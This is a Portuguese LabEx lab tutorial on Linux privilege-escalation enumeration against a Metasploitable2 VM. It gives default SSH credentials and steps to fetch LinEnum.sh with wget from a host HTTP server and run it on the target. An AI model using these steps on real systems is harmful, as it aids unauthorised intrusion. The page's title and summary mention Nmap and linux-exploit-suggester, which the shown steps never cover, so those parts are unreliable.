LabEx
EntrarJunte-se

Explore Ferramentas de Escalada de Privilégios Linux no Nmap

Beginner

Introdução

Neste laboratório, exploraremos duas das ferramentas de automação de escalonamento de privilégios Linux mais comumente usadas - LinEnum e linux-exploit-suggester. O objetivo é aprender a usar essas ferramentas de forma eficaz para acelerar o processo de escalonamento de privilégios durante um teste de penetração ou avaliação de segurança. Dominar essas ferramentas pode economizar significativamente tempo e esforço, permitindo que você se concentre na compreensão dos princípios e metodologias subjacentes ao escalonamento de privilégios.

Configurando o Ambiente

Nesta etapa, configuraremos a máquina virtual Metasploitable2, que servirá como nosso sistema alvo. Siga as instruções abaixo para iniciar a máquina virtual e estabelecer uma conexão:

Em nosso ambiente de laboratório, a configuração da máquina virtual Metasploitable2 já foi pré-configurada. Você pode iniciar a máquina virtual e conectar-se a ela usando as seguintes etapas:

  1. Abra um terminal e execute o seguinte comando para iniciar a máquina virtual Metasploitable2:

    sudo virsh start Metasploitable2

  2. Aguarde 1-2 minutos até que a máquina virtual seja totalmente inicializada e esteja pronta.

  3. Verifique se você consegue fazer ping no endereço IP do Metasploitable2 (192.168.122.102) a partir da sua máquina host.

  4. Use o seguinte comando para conectar-se à máquina virtual Metasploitable2 via SSH:

    ssh msfadmin@192.168.122.102

    Na primeira conexão, você será solicitado a aceitar a autenticidade do host. Digite yes e pressione Enter para continuar.

    Em seguida, insira a senha msfadmin quando solicitado:

    msfadmin

Após a autenticação bem-sucedida, você deverá ter uma sessão de shell com poucos privilégios na máquina virtual Metasploitable2.

LinEnum: Automatizando a Enumeração de Sistemas Linux

LinEnum é um script poderoso que automatiza o processo de enumeração em um sistema Linux, reunindo informações valiosas que podem auxiliar no processo de escalonamento de privilégios. Siga as etapas abaixo para usar o LinEnum na máquina virtual Metasploitable2:

  1. Em sua máquina host, abra um terminal e navegue até o diretório /tmp:

    cd /tmp

    Há um script chamado LinEnum.sh no diretório /tmp do projeto.

  2. Inicie um servidor HTTP Python no diretório /tmp para hospedar o script LinEnum:

    python3 -m http.server 8000

  3. Na VM Metasploitable2, navegue até o diretório /tmp e baixe o script LinEnum usando wget do servidor HTTP Python em execução em sua máquina host:

    Navegue até o diretório /tmp:

    cd /tmp
    wget 192.168.122.1:8000/LinEnum.sh -P /tmp

  4. Torne o script LinEnum executável:

    chmod +x LinEnum.sh

  5. Execute o script LinEnum e redirecione a saída para um arquivo para análise posterior:

    LinEnum.sh > linenum_output.txt

LinEnum realizará várias verificações e enumerará informações do sistema, destacando potenciais vulnerabilidades ou configurações incorretas em texto amarelo. Preste muita atenção a essas áreas destacadas, pois elas podem revelar oportunidades para escalonamento de privilégios.

Resumo

Neste laboratório, aprendemos como usar duas ferramentas de automação poderosas, LinEnum e linux-exploit-suggester, para auxiliar no processo de escalonamento de privilégios em sistemas Linux. O LinEnum fornece uma enumeração abrangente das informações do sistema, destacando potenciais vulnerabilidades e configurações incorretas. A ferramenta linux-exploit-suggester analisa a versão do kernel e sugere exploits de kernel relevantes que podem levar ao escalonamento de privilégios.

Ao alavancar essas ferramentas, podemos otimizar as fases de coleta e análise de informações, economizando tempo valioso durante um teste de penetração ou avaliação de segurança. No entanto, é crucial entender que essas ferramentas são destinadas a auxiliar no processo, e uma sólida compreensão das técnicas e metodologias de escalonamento de privilégios ainda é essencial para uma exploração bem-sucedida.

Ao longo deste laboratório, praticamos a configuração de um ambiente de máquina virtual vulnerável, o download e a execução dos scripts LinEnum e linux-exploit-suggester e a interpretação de suas saídas. A experiência prática obtida neste laboratório será inestimável em cenários do mundo real, onde o escalonamento de privilégios eficiente e eficaz é uma habilidade crítica para hackers éticos e profissionais de segurança.